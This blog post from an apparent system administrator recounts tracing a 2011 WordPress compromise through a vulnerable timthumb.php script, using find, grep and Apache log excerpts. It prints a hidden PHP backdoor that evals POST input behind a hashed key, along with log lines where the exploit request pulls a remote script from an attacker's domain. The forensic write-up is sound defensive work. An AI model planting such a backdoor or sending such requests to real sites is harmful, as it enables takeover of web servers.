Wordpress timthumb hack - a PHP hack story

Written by - 0 comments

Published on - Listed in Linux PHP Hacks Wordpress

And the cat and mouse game goes on and on...

As I already wrote in another post 'On a hacker's trail', it's always the same story: Admin (tries) to secure system as much as possible, hackers (might) come in, admin finds hacker and fixes vulnerability, hackers (might) find other vulnerabilities.... and so on. At least it keeps me busy ;-).

This time I stumbled over a Wordpress hack which is known since August 2011 (after some research I found that information). The first hint were exceptionally many POST entries in the access log file of a virtual host. So I checked which files were created via browser (therefore uid of Apache):

# for file in $(find . -user www-data | grep .php)
> do
> ls -l $file
> done
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-admin/upd.php
-rw-r--r-- 1 www-data www-data 4 2011-08-05 17:45 ./critics/wp-content/themes/InReview/cache/external_9cb702aa084691e66c789c1e98d6233a.php
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-content/upd.php
-rw-r--r-- 1 www-data www-data 1.6K 2011-08-21 19:39 ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
-rw-r--r-- 1 www-data www-data 887 2011-10-07 20:04 ./photo/wp-content/themes/DeepFocus/cache/a31844cea72ed6c9f90b56b039bbf3f5.php
-rw-r--r-- 1 www-data www-data 15K 2011-07-20 10:59 ./photo/wp-content/w3-total-cache-config.php

There were some more files but I left out session files.

After taking a closer look at some files, I came across external_ed59d62e1b1e2167275feed65b374079.php which showed an interesting content:

# more ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
`%Á©bÒ¼#rºôùÚÒ7£Ê:øA\kömúФGÀï^L                               ý×íV~dìúZÃTj

ç                       ¦âV     ÔÒgãUØÑI
Ñ@YñËÔ¥yA¶P*WëßI2!$Û9¯Å¡c5ÿÕØÇA35ÚD&íôÓP«;<?php                                   ÒVZZÚ]é°iöhFÍ ÖJ)^WÍ] Ó®
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){$Um51Å?uä%Ä5V`½
$cmd = $_POST["code"];
eval (stripslashes($cmd));

The file starts with binary code, as if it tries to 'hide' as a non-text file, so a correct grep cannot be executed on that file:

# grep -r "eval (stripslashes" *
Binary file photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php matches

But even more interesting is the fact what happens after the binary part. The php file expects a variable '$key' via POST method. If the md5 hash of the given 'key' variable matches, then a second variable '$cmd' (also submitted by POST) will be executed on the system.

OK, so far I knew this file doesn't belong to Wordpress and it's dangerous. But how did it come on the system?

Let's take a look in the Apache logs what happened on August 21st at around 19:39 when the file was created/modified: - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/thumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 404 22638 "" "Opera/9.80 (Windows NT 6.
1; U; en) Presto/2.6.30 Version/10.62" - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/timthumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 200 10557 "" "Opera/9.80 (Windows NT
 6.1; U; en) Presto/2.6.30 Version/10.62"

The hacker first tried to use thumb.php - but this file doesn't exist. On the second try he was successful by using timthumb.php, a php script to upload images which obviously is vulnerable.

So this is the source and this needs to be fixed.

This hack was first discovered by Mark Maunder on August 1st 2011 and he explains in a very good article how it was possible to use timthumb.php (very easy in fact!).

Another good article can be found on this page.

Add a comment

Show form to leave a comment

Comments (newest first)

No comments yet.